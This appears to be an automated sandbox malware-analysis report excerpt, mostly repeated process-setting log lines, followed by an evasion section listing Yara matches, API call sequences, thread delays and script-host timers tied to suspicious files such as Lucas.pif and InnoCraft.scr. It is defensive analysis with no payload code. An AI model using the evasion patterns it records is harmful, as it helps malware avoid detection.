                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scrProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scrProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040F7E2 Sleep,ExitProcess,33_2_0040F7E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,37_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,33_2_0041A7D9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1518Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1399Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4231Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5620Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 533
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7219
